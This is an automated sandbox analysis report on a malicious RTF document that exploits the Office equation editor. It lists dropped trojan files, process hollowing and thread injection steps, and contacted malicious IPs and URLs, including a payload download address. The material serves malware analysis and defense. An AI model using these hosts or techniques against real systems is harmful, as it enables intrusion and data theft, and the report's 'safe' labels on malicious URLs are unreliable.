          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321301 Sample: fqwBU8MyzT.rtf Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 41 www.opalthemovie.com 2->41 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 Multi AV Scanner detection for dropped file 2->61 63 14 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 WINWORD.EXE 336 20 2->16         started        18 EQNEDT32.EXE 2->18         started        signatures3 process4 dnsIp5 43 103.207.38.170, 49165, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 11->43 37 C:\Users\user\AppData\Local\...\pp[1].exe, PE32 11->37 dropped 39 C:\Users\Public\vbc.exe, PE32 11->39 dropped 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->83 20 vbc.exe 11->20         started        file6 signatures7 process8 signatures9 65 Multi AV Scanner detection for dropped file 20->65 67 Machine Learning detection for dropped file 20->67 69 Writes to foreign memory regions 20->69 71 2 other signatures 20->71 23 RegSvcs.exe 20->23         started        26 RegSvcs.exe 20->26         started        process10 signatures11 73 Modifies the context of a thread in another process (thread injection) 23->73 75 Maps a DLL or memory area into another process 23->75 77 Sample uses process hollowing technique 23->77 79 Queues an APC in another process (thread injection) 23->79 28 explorer.exe 23->28 injected 81 Tries to detect virtualization through RDTSC time measurements 26->81 process12 dnsIp13 45 auctionpros.club 162.0.232.118, 49166, 80 NAMECHEAP-NETUS Canada 28->45 47 www.sgbanfang.com 146.148.194.209, 49167, 80 HENGTONG-IDC-LLCUS United States 28->47 49 www.auctionpros.club 28->49 85 System process connects to network (likely due to code injection or exploit) 28->85 32 wlanext.exe 28->32         started        signatures14 process15 signatures16 51 Modifies the context of a thread in another process (thread injection) 32->51 53 Maps a DLL or memory area into another process 32->53 55 Tries to detect virtualization through RDTSC time measurements 32->55 35 cmd.exe 32->35         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          fqwBU8MyzT.rtf49%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
          fqwBU8MyzT.rtf100%AviraEXP/CVE-2017-11882.wizmq

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe35%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          C:\Users\Public\vbc.exe35%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.RegSvcs.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://www.auctionpros.club/glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri0%Avira URL Cloudsafe
          http://www.sgbanfang.com/glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri0%Avira URL Cloudsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://103.207.38.170/pp.exe0%Avira URL Cloudsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          auctionpros.club
          		162.0.232.118
          		truetrue
            		unknown
            www.sgbanfang.com
            		146.148.194.209
            		truetrue
              		unknown
              www.auctionpros.club
              		unknown
              		unknowntrue
                		unknown
                www.opalthemovie.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.auctionpros.club/glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiritrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sgbanfang.com/glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiritrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.207.38.170/pp.exetrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.rambler.ru/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmpfalse
                                		high
                                http://buscar.ya.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://asp.usatoday.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://rover.ebay.comexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://search.ebay.in/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://%s.comexplorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		low
                                                  http://msk.afisha.ru/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://www.msn.com/?ocid=iehpsexplorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.rediff.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.windows.com/pctv.explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.naver.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://www.google.ru/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://search.daum.net/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://buscar.ozu.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.about.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000007.00000000.2113858864.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.ask.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.cjmall.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://search.centrum.cz/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://suche.t-online.de/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.google.it/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.amazon.de/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2120970745.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.google.cz/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.soso.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.univision.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1yexplorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://investor.msn.com/explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.espn.go.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      162.0.232.118
                                                                                                                                                      		unknownCanada
                                                                                                                                                      		22612NAMECHEAP-NETUStrue
                                                                                                                                                      146.148.194.209
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		26658HENGTONG-IDC-LLCUStrue
                                                                                                                                                      103.207.38.170
                                                                                                                                                      		unknownViet Nam
                                                                                                                                                      		45899VNPT-AS-VNVNPTCorpVNtrue

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:321301
                                                                                                                                                      Start date:20.11.2020
                                                                                                                                                      Start time:20:03:31
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 10m 27s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:fqwBU8MyzT.rtf
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.expl.evad.winRTF@12/8@3/3
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:
